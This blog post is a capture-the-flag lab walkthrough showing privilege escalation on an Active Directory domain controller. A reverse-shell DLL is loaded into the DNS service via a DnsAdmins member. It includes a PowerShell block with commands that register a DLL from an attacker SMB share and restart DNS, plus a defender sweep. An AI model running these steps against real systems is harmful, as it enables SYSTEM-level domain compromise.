ACTIVE DIRECTORY — PRIVILEGE ESCALATION

Escalating Privileges with DNSAdmins Group

Nairuz Abulhul (R3d Buck3T), published Apr 16, 2021

Malicious DLL Injection on an Active Directory Domain Controller


Recently, I learned a privilege escalation technique that abuses the DNS service running on a domain controller. The technique relies on the privileges given by default to members of the DnsAdmins group.

🎯 The attack vector consists of making the DNS service, which runs as SYSTEM, load a malicious DLL as a server-level plugin; the DLL executes with SYSTEM privileges when the service restarts.

For the attack to work, you need to have compromised either an account that is a member of the DnsAdmins group or one that has write privileges on the DNS server object.

In this lab we abuse the first scenario. I’ll demonstrate the steps of the DLL injection on the Resolute machine from Hack The Box.

$_Attack_Outline

🎯 Goal: Escalating to domain Admin

🛠️ What do we have

  • A user account; member of DNSAdmins Group

🔥 HOW: DLL injection via a malicious DNS server plugin

🛠️$_Escalation_Demo

I already have a foothold on the Resolute machine and access to Ryan’s account, which is a member of the DnsAdmins group.

The next step is building the malicious DLL that will give us the SYSTEM shell. There are two ways to do this: generate a DLL with msfvenom, or compile the DLL from scratch on a Windows machine.

I learned from the IppSec video that the problem with an msfvenom-generated DLL is that the DNS service crashes after it restarts; that’s because the reverse shell created by msfvenom does not fork off as a separate process, so the service never completes its startup. A generic msfvenom DLL also lacks the plugin functions the DNS service expects to find in a server-level plugin, so even though the shell comes back, the service ends up stopped.

That’s not a good thing during a pentest: a DNS server that fails to start on a domain controller breaks name resolution for the whole domain.

To get around this, we add a function to the DLL that starts the elevated shell in a new thread, so the plugin initialization returns and the DNS service keeps running.

I am no expert in C++ 😏, so I followed the steps provided excellently by ired.team and IppSec.

💉$_Injection_Time

1- Download and extract the DNS-Exe-Persistance code from GitHub. It is bare-bones code for a DNS server plugin DLL and already contains the plugin entry point (DnsPluginInitialize) that the DNS service calls.

We will need to modify the code on a Windows machine to include our reverse shell.

2- In the extracted folder, open the sln file with Visual Studio.

🚦 An SLN file is a solution file used for organizing projects in Microsoft Visual Studio. It contains text-based information about the project environment and project state. (fileinfo)

3- In the “Source Files” directory, add a new file for the shell code: right-click the directory, select Add, then New Item, choose C++ File, and name it reverseshell.cpp.

The C++ reverse shell sample is from tudorthe1ntruder’s repo on GitHub: https://github.com/dev-frog/C-Reverse-Shell/blob/master/reverse.c

reverseshell.cpp

4- Replace the IP address and port number with the attacking machine’s IP and the port you are listening on with netcat.

Turn the int main function into a regular function, since it is no longer the program’s entry point.

We will call our function Reverseshell.

reverseshell.cpp

5- Next, create a header file: right-click the “Header Files” directory, select Add >> New Item, and name it reverseshell.h.

reverseshell.h

6- In the “Main.cpp” file, the DnsPluginInitialize function creates a new thread whose start routine is the Reverseshell function.

📞 When the DNS service loads the plugin and calls DnsPluginInitialize, the shell runs in that new thread (the reverse shell code spawns the command interpreter as its own process), DnsPluginInitialize returns right away, and the service finishes starting and stays up.

Main.cpp file

7- Change the build configuration from Debug to Release, and choose the architecture of the target machine; in our case it is x64. A 32-bit DLL will not load into the 64-bit dns.exe process.

Compile the DLL code, and hope it builds correctly 😅.

Release — x64
Compile the code — BUILD

8- Great, the DLL is ready to use. Transfer the file to the attacking machine; we will have the DNS server load it remotely over a UNC path.

Set up an SMB share on the attacking machine (Impacket’s smbserver.py works for this).

SMB sharing with Impacket

9- On the domain controller, run the dnscmd command below to register the malicious DLL (DNSPriv.dll) from our attacking machine as the server-level plugin.

📍 dnscmd is a Windows command-line utility for managing a DNS server; members of DnsAdmins are allowed to use it to change the server configuration.

10- After it runs successfully, stop the DNS service and start it again to trigger the DnsPluginInitialize function.

11- As we see, after the restart the DNS service loaded our DLL, and we got the elevated shell as SYSTEM 😈
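The DC-side commands for steps 8 to 11, written out as an added example (this is not the code from the original post, and it is what I would type into a PowerShell prompt as the DnsAdmins member). It also adds the checks a tester wants around the procedure: confirming group membership first, verifying where dnscmd actually writes the setting, confirming the service came back up, cleaning up from the SYSTEM shell afterwards, and a defender-side sweep for a planted plugin. The attacker IP 10.10.14.5, the share name share, the DLL name DNSPriv.dll and the DC hostname resolute are assumptions for illustration.

```powershell
# Added example, not the original post's code. Assumed values: attacker host 10.10.14.5
# serving an SMB share named "share" (Impacket smbserver on the attacking box), the
# compiled plugin DNSPriv.dll, and a DC named "resolute" running the DNS role.
$AttackerDll = '\\10.10.14.5\share\DNSPriv.dll'
$DnsServer   = 'resolute'

# 1. Prerequisite: the compromised account must be a member of DnsAdmins.
whoami /groups | Select-String -Pattern 'DnsAdmins'

# 2. Register the remote DLL as the server-level plugin. dnscmd writes this into
#    HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll;
#    nothing executes until the DNS service is restarted.
dnscmd $DnsServer /config /serverlevelplugindll $AttackerDll

# 3. Verify the setting landed before touching the service.
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                 -Name ServerLevelPluginDll

# 4. Restart the service so it loads the plugin and calls DnsPluginInitialize.
#    This needs stop/start rights on the DNS service; on Resolute ryan had them.
sc.exe \\$DnsServer stop dns
Start-Sleep -Seconds 3
sc.exe \\$DnsServer start dns

# 5. Confirm the service is RUNNING again. If the DLL blocks in its entry point or
#    lacks the plugin exports, this shows STOPPED even though a shell may have come back.
sc.exe \\$DnsServer query dns

# 6. Cleanup, from the SYSTEM shell obtained in step 11: remove the plugin value and
#    restart DNS so the domain's resolver is left exactly as it was found.
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                    -Name ServerLevelPluginDll
Restart-Service -Name DNS

# Defender check: sweep every DC for a ServerLevelPluginDll value. On a healthy server
# the value is absent; any path, and especially a UNC path, deserves an immediate look.
Get-ADDomainController -Filter * | ForEach-Object {
    Invoke-Command -ComputerName $_.HostName -ScriptBlock {
        Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                         -Name ServerLevelPluginDll -ErrorAction SilentlyContinue |
            Select-Object PSComputerName, ServerLevelPluginDll
    }
}
```

On the attacking side the share is served with Impacket’s smbserver.py and the listener is a plain netcat on the port compiled into Reverseshell; the order matters: start the listener and the share before step 4, because the DLL is fetched over SMB and connects back at the moment the service starts.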

The Resolute box was one of my favorite machines in the Active Directory track. I learned more about this technique and tinkered with the C++ code for building the exploit.

All of the modified code and the used commands can be found at R3d-Buck3T — Notion.

That’s all for today. Thanks a lot for reading.
